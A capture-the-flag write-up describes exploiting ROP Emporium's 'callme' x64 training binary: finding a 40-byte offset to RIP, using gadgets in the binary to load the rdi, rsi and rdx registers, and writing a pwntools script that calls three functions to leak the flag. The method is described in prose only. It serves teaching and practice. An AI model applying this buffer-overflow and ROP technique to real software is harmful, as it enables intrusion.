In this write-up, I'll show how I managed to exploit ROP Emporium's 'callme' x64bit binary. This challenge requires calls to functions present within the binary with specific parameters in order to read the flag utilizing ROP chains. If you don't know what ROP chains are and how they can be used to bypass certain mitigations then I suggest you look at this here. This contains alot of other exploitation techniques you can also look at for your own curiosity. Let's start with the challenge.
We start off by having a look at the 'callme' file protections and file type to see what we're dealing with.
the challenge has only NX enabled, which shows that the stack is non-executable which essentially stops us from injecting shellcode onto the stack and jumping to it. challenge is also dynamically linked, which just tells us the C code the challenge is using (printf and other standard functions) are found in libc and its not stripped, which makes reversing easier.
We already know that theres a buffer overflow vuln located in the binary. After generating a cyclic pattern of 100 bytes and injecting these junk bytes into the program triggers a segmentation fault, indicating we've written to other segments of memory. The next step now since a seg fault has been triggered is to establish how many bytes it would take from where our input starts to where RIP or the Instruction pointer is. We do that by using the cyclic -l command in pwndbg
40 bytes. cool. Now we know the distance from our input to RIP. Now comes the juicy part. According to the description, we need to call the callme_one(), callme_two() and the callme_three() functions respectively, with 0xdeadbeefdeadbeef, 0xcafebabecafebabe and 0xd00df00dd00df00d as function parameters. To achieve this, we are aware that the cdecl x64 bit Intel architecture calling convention dictates that function parameters are to be passed in rdi, rsi, rdx, r8 and r9 registers respectively.
Let's analyze the binary quickly to see if there are any interesting functions.
Interesting. Notice that there's a usefulGadgets function located in the binary. And if you know anything about ROP chains, you'll know that a ROP chain is essentially of gadgets ending with a RET instruction that can be used to bypass NX protection and achieve cod execution. And by having a look at the function in pwndbg, it has exactly the gadgets we need! It's looking good so far! Now all we need to do is to create an exploit script to exploit the vulnerability and leak the flag.
Final exploit script.
I'm using pwntools for the script. It's a useful python based exploit development and reversing tool that has quite a few handy tools you can utilize. Its a short exploit script. First half of the script just defines the path to the challenge as well as hard code the actual function parameters needed.
The second half creates a function that setup the arguments on the stack along with the ret instruction overwriting the RIP as well as a for loop which is to execute multiple times until all the functions are called with the correct parameters.
Now we run the script.
exploit script worked. Flag Leaked!